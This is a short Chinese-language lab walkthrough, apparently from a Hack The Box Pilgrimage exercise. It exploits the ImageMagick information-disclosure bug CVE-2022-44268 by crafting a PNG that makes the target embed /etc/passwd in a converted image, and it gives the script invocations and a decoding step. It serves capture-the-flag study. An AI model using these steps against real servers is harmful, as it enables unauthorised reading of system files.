也用于 HTB Pilgrimage
MetabaseQ 的研究人员发现了 CVE-2022-44268,即 ImageMagick 7.1.0-49 存在信息泄露漏洞。当它解析 PNG 图像(例如用于调整大小)时,生成的图像可能嵌入任意远程文件的内容(如果 ImageMagick 二进制文件具有读取该文件的权限)。
步骤 1:
运行
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
步骤 2:
运行
python3 magick_exploit.py generate -l [local_file] -o [output_file]
此处的本地文件是 /etc/passwd,我想从目标机器获取该文件。
步骤 3:
将图像文件上传到网站
步骤 4:
从网站获取转换后的图像文件。
将其命名为 downloaded_image.png
步骤 5:
运行
python3 decode_profile.py

如果出现如下错误:
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
这意味着你提到的文件不存在。请使用 /etc/passwd 进行验证。